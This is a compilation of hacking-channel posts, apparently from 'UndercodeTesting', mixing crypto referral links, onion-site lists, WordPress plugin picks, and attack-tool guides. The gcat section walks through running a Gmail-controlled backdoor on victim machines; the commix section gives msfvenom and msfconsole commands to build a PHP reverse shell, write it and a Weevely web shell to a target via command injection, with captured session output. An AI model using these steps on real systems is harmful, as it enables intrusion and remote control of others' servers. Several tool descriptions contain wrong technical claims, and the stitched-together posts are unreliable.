▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑tOP WEBSITEs FOR Earn Bitcoin- Cryptocurrency
T.me/UndercodeTesting

https://minergate.com/

https://www.bitcoinget.com/

https://coinbucks.io/

bitcoin.com also free btc

http://cointiply.com/r/LBVeJ

https://octoin.com/6182045928OCC

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A PoC backdoor that uses Gmail as a C&C server

> A Gmail account (Use a dedicated account! Do not use your personal one!)

> Turn on "Allow less secure apps" under the security settings of the account

> You may also have to enable IMAP in the account settings

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/byt3bl33d3r/gcat

2) cd gcat

3) run as python implant.py

🦑 Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the

> OS the implant is running on

Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command

> Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


🦑 Windows IP Configuration

Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 new update Automated All-in-One OS command injection and exploitation tool- for any linux os
t.me/undercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/commixproject/commix.git

2) cd commix

3) run python setup.py

🦑 Create the PHP meterpreter shell (via msfvenom)

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.3 LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php

Note: Don't forget to add <?php and ?> in to msfvenom.php file

Step 2: Start the handler (via msfconsole)

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...

Step 3: Use commix to create "msfvenom.php" file on target's "/var/www/" directory and execute it.

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"

Step 4: Enjoy your shell!

[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400

meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
2. Upload a Weevely PHP web shell on target host.
Step 1 : Create the PHP web shell.

weevely generate commix
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
Step 2 : Use commix to create "weevely.php" file on target's "var/www/html/cmd/" directory.

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"

Step 3 : Enjoy your shell!

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New 2020 deepweb .onion for > Blogs


http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ – Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ – Hushbox
http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul
http://tns7i5gucaaussz4.onion/ – FreeFor
http://gdkez5whqhpthb4d.onion/ – Scientology Archive
http://newsiiwanaduqpre.onion/ – All the latest news for tor
http://5vppavyzjkfs45r4.onion/ – Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ – AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ – Blog about Stories
http://tigas3l7uusztiqu.onion/ – Mike Tigas
http://mpf3i4k43xc2usxj.onion/ – Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ – An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ – Totse 2
http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home
http://nwycvryrozllb42g.onion/searchlores/index.htm – Fravia’s Web Searching Lore
http://newsiiwanaduqpre.onion/ – OnionNews – Blog about the onionland

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 deepweb forums via the Anonet Webproxy 7/24 online


http://sbforumaz7v3v6my.onion/ – SciBay Forums

http://kpmp444tubeirwan.onion/ – DeepWeb

http://r5c2ch4h5rogigqi.onion/ – StaTorsNet

http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing,
messaging and much more. Use a fake email to register.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑File upload vulnerability scanner and exploitation tool.
termux-linux

> Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.
t.me/UndercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/almandin/fuxploider.git

2) cd fuxploider

3) pip3 install -r requirements.txt

🦑 For Docker installation

# Build the docker image
docker build -t almandin/fuxploider

4)example run :

> python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"


@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST WORDPRESS 2020 PLUGINS
twitter.com/undercodeNews

1) WPForms integrates with all popular marketing and payment platforms, so you can build powerful forms in less than 5 minutes.
https://wpforms.com/

2)MonsterInsights is the best Google Analytics plugin for WordPress. It allows you to “properly” connect your website with Google Analytics, so you can see exactly how people find and use your website.

https://www.monsterinsights.com/

3) Yoast SEO is one of the most popular WordPress plugin of all time. Out of all the WordPress SEO plugins, Yoast offers the most comprehensive solution with all the features and tools that you need to improve your on-page SEO.
https://wordpress.org/plugins/wordpress-seo/

4) Email is the most effective and most reliable marketing tool at your disposal as a business owner. It allows you to stay in touch with your users even after they leave your website. This is why we recommend every business owner to start building an email list right away.

https://www.constantcontact.com/global/home-page

5) OptinMonster is the most popular conversion rate optimization software in the market. It allows you to convert abandoning website visitors into email subscribers and customers.

https://optinmonster.com/

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MOST ACTIVE ATTACKS 2020 :
instagram.com/UndercodeTesting


1. Phishing
One of the most insidious techniques used today is Phishing.It’s hard to find the person that doesn’t know what phishing is. However a lot of users are still getting tricked by hackers on a daily basis.
Phishing implies the replication of the website with the aim of stealing money or personal information. And once a user enters his credit card details,for example, a hacker will have access to that data and will be able to use the received information for his own benefit.

2. Viruses and malicious code
Hackers can crawl almost into any website and leave in its’ database malware or insert code into the website’s files. There is a huge variety of viruses, and each may impact the infected site differently. But there should be no doubt that a virus, regardless of its type, will not benefit your business.

3. UI Redress
This technique is similar to phishing. But in this case, a hacker would create a fake hidden user interface. Once the a user clicks the button with an intention of to proceed to a certain page, he will find himself on an unfamiliar website, usually with an inappropriate content.

4. Cookie Theft
With the help of a malicious software hackers can steal your browser’s cookies. And those cookies contain a lot of important information: browsing history, usernames and passwords. As you understand,that data can also contain logins and password to your website’s administrator’s panel.

5. Denial of Service (DoS\DDoS)
DDOS stands for Distributed Denial of Service. DDOS attack is a way to make a certain server unavailable or, in other words, a way to crash the server.

To interrupt or crash the server a hackers would use bots. Those bots soul purpose is to send requests to the website, a lot of requests. As a result, a server unable to process all of the received requests will simply crash. The most hazardous thing about this technique is that a hacker can crash the server in a relatively small amount of time

6. DNS spoofing
This malware is also known as DNS cache poisoning. It engages that old cache data you might have forgotten about.
Vulnerabilities in the domain name system allow hackers to redirect traffic from your website to a malicious one. Moreover, hackers can program this attack so the infected DNS server will infect another DNS and so on.

7. SQL injection
If your website has vulnerabilities in its SQL database or libraries, hackers can get access to your confidential information by deceiving the system.So there is no surprise that SQL injections can also be a simple tool. But this simple tool can allow a hacker to access vital information of your website.

8. Keylogger injection
The Keylogger that very simple and dangerous malicious code.
The malware records keystrokes , captures all of the user’s actions on the keyboard, and to send all that has been recorded to the hackern ; it also installs a malicious script that produces an in-browser cryptocurrency miner.
If a hacker succeeds in obtaining data, then the result of the hacking will be stolen admin credentials that can allow hackers to easily log into your website

9. Non-targeted website hack
In most cases, hackers don’t target a specific website. They are more interested in massive hacking.
It is easy to suffer from a non-targeted attack – you just need to overlook any CMS, plugin or template vulnerability. Any gap is a chance to get into the hacker’s sight and become a victim during the next attack.
Hackers can find websites with similar weaknesses easily. They can always use Google’s Hacking Database to receive a list of vulnerable websites that have the same properties. For example, hackers can find all indexed websites that have a vulnerable plugin installed. Or websites with unhidden catalogues.

10. Brute force
A Brute Force Attack is the simple method to gain access to a website. It tries various combinations of the passwords again and again until it gets in. This repetitive action is like an army attacking a fort.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑most 2020 phishing tools used by hackers

> on github

Infosec IQ


Gophish.

LUCY.

Simple Phishing Toolkit (sptoolkit)

Phishing Frenzy.

King Phisher.

SpeedPhish Framework (SPF)

Social-Engineer Toolkit (SET)

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MOST USED BRUTE FORCE TOOLS 2020
t.me/UndercodeTesting



1)Ophcrack for windows is an excellent option for brute forcing passwords and cracking.

http://ophcrack.sourceforge.net/

2) Brutus uses a technique called time memory trade off which allows for large multi-threaded brute forcing attacks all at once.

http://www.hoobie.net/brutus/

3) Cain and Able is not only a password cracker but and overall excellent network security tool.

> http://www.oxid.it/

4) John the Ripper is compatible with Linux, Unix and fully able to brute force Windows LM hashes. Although, John the Ripper is not directly suited to Windows. This software is extremely fast at brute force cracking Linux and Unix NTLM hashes.

> http://www.openwall.com/john/

5) Medusa is a variation of the THC Hydra cracking software. Medusa has many advantages by being a speedy parallel, modular and login brute forcing tool.

<> http://foofus.net/goons/jmk/medusa/medusa.html

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁